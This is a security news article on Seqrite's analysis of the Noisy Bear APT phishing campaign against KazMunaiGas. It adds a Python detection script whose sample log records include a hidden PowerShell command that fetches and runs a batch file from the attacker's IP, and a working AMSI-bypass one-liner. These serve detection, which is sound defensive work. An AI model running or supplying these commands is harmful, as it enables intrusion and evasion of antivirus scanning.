Infection Chain | Image: Seqrite Labs APT-Team
The Seqrite Labs APT-Team has released an in-depth analysis of a newly discovered threat actor dubbed Noisy Bear, active since April 2025 and focusing on Kazakhstan’s oil and gas sector. The group’s tactics combine spear-phishing, PowerShell loaders, and DLL implants, leveraging decoy documents crafted to mimic internal communication from KazMunaiGas (KMG).
According to Seqrite, “this threat group has targeted entities in Central Asia, such as targeting the Oil and Gas or energy sector of Kazakhstan. The campaign is targeted towards employees of KazMunaiGas or KMG where the threat entity delivered a fake document related to KMG IT department, mimicking official internal communication and leveraging themes such as policy updates, internal certification procedures, and salary adjustments.”
Noisy Bear relies on spear-phishing emails sent from compromised KMG business accounts. Messages carried subjects like “URGENT! Review the updated salary schedule” and attached a ZIP archive (График.zip – Schedule.zip) containing a malicious shortcut file (График зарплат.lnk – Salary Schedule.lnk).
The email text was carefully crafted to appear as internal HR communication, emphasizing urgency with a deadline of May 15, 2025. Seqrite notes, “the message basically says about reviewing updated information about work schedules, salaries and incentives related policies and decisions.”
Opening the ZIP revealed a decoy PDF branded with the KazMunaiGas logo and bilingual instructions in Russian and Kazakh. Victims were told to extract another ZIP (KazMunayGaz_Viewer.zip) and run an executable while ignoring a console window.
The advisory explains, “the decoy also mentions users to wait for a console window to appear and specifically advised them not to close or interact with it, to limit suspicion on targets’ ends.”
Seqrite’s technical analysis breaks down the attack into four stages:
- Stage 0 – Malicious LNK: The shortcut executed PowerShell LOLBins to download a batch script (123.bat) from hxxps://77.239.125.41:8443.
- Stage 1 – Batch Scripts: Scripts like 123.bat and it.bat downloaded PowerShell loaders (support.ps1, a.ps1), dubbed DOWNSHELL.
- Stage 2 – DOWNSHELL Loaders: These PowerShell scripts disabled AMSI scanning and injected Meterpreter shellcode into explorer.exe using techniques copied from PowerSploit. Seqrite explains, “changing or flipping this flag convinces PowerShell that the AMSI has failed to initialize, so the other malicious script belonging to DOWNSHELL family, does not get scanned and executes without any hassle or interruption.”
- Stage 3 – DLL Implant: A 64-bit DLL used semaphores to prevent multiple instances, then hijacked rundll32.exe’s thread context to execute a reverse shell.
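The four stages above leave distinct traces in ordinary Windows telemetry: a PowerShell process launched from the desktop with a download cradle pointing at a raw IP on a non-standard port (Stage 0), a batch file handing off to a .ps1 loader (Stage 1), and a script block that reaches into AmsiUtils to flip the initialisation-failed flag (Stage 2). The following Python is an added detection example written for this page; it is not code from Seqrite or from the campaign. It runs a few content rules over constructed sample records shaped like Sysmon process-creation and PowerShell script-block log entries. The IP:port and file names are the ones the report names; every command line, the benign entries, and the rule names are assumptions made for illustration.

```python
import re

# Constructed sample telemetry, not real captures. Record shapes loosely follow
# Sysmon Event ID 1 (process creation) and PowerShell Event ID 4104 (script block
# logging). Only the IP:port and the file names 123.bat / support.ps1 come from the
# report; the command lines and the benign entries (ids 3 and 5) are assumed.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe -w hidden -nop -ep bypass -c "iwr https://77.239.125.41:8443/123.bat '
                '-OutFile $env:TEMP\\123.bat; cmd /c $env:TEMP\\123.bat"'},
    {"id": 2, "type": "scriptblock",
     "script": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
               ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"},
    {"id": 3, "type": "scriptblock",
     "script": "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object"},
    {"id": 4, "type": "process", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File support.ps1"},
    {"id": 5, "type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
]

# Common PowerShell download cradles.
DOWNLOAD_CRADLE = re.compile(
    r"(?:iwr|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|"
    r"net\.webclient|curl|wget)", re.IGNORECASE)
# URL built on a raw IPv4 literal with an explicit port. Accepts the defanged
# "hxxps" form too, so the same rule can be run over report text or IoC feeds.
IP_WITH_PORT = re.compile(r"h(?:tt|xx)ps?://(\d{1,3}(?:\.\d{1,3}){3}):(\d{2,5})", re.IGNORECASE)
# Flags that hide the window or switch off profile / execution-policy controls.
EVASIVE_FLAGS = re.compile(
    r"(?:-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b|-ep\s+bypass|-executionpolicy\s+bypass)",
    re.IGNORECASE)
# Reflection against the AMSI plumbing inside System.Management.Automation.
AMSI_TAMPER = re.compile(r"(?:amsiInitFailed|AmsiUtils|AmsiScanBuffer|amsiContext)", re.IGNORECASE)


def detect(event):
    """Return the sorted list of rule names that fire on one event (empty if none)."""
    hits = []
    if event["type"] == "process" and event.get("image", "").lower() == "powershell.exe":
        cmd = event.get("cmdline", "")
        parent = event.get("parent", "").lower()
        m = IP_WITH_PORT.search(cmd)
        # Stage 0 pattern: cradle + raw IP + a port that is not plain 80/443.
        if DOWNLOAD_CRADLE.search(cmd) and m and m.group(2) not in ("80", "443"):
            hits.append("ps_download_cradle_ip_nonstd_port")
        # A double-clicked LNK shows up as explorer.exe spawning PowerShell; two or
        # more evasive flags at once is rarely how an administrator types a command.
        if parent == "explorer.exe" and len(EVASIVE_FLAGS.findall(cmd)) >= 2:
            hits.append("ps_evasive_flags_from_explorer")
        # Stage 1 pattern: a batch file (cmd.exe parent) launching a .ps1 with policy bypass.
        if parent == "cmd.exe" and EVASIVE_FLAGS.search(cmd) and re.search(r"-file\s+\S+\.ps1", cmd, re.I):
            hits.append("batch_launches_ps_loader")
    elif event["type"] == "scriptblock":
        # Stage 2 pattern: script block logging captures the AMSI flag flip even
        # though AMSI itself no longer scans what follows it.
        if AMSI_TAMPER.search(event.get("script", "")):
            hits.append("amsi_init_flag_tamper")
    return sorted(hits)


def triage(events):
    """Map event id -> rule hits for every event that fired at least one rule."""
    return {e["id"]: detect(e) for e in events if detect(e)}


if __name__ == "__main__":
    for event_id, rules in triage(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(rules)}")
```

Script block logging (Event ID 4104) is the key source here: the AMSI flag flip is visible in the logged script block regardless of whether AMSI later scanned the payload it unlocked, so this rule keeps working after the bypass has succeeded. The benign entries (a profile-less `Get-Date` and a directory listing) are included to show the thresholds do not fire on routine use.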
Noisy Bear hosted payloads and tools—including open-source penetration frameworks like Metasploit and PowerSploit—on infrastructure provided by Aeza Group LLC, a Russian hosting provider sanctioned for aiding cybercrime.
Seqrite also observed suspicious domains hosting wellness and fitness-themed sites for Russian individuals, likely serving as infrastructure camouflage.
Indicators cited for a Russian nexus include:
- Russian-language comments in scripts.
- Use of sanctioned Russian hosting providers.
- Overlap in tooling and infrastructure with prior Russian-linked APT campaigns.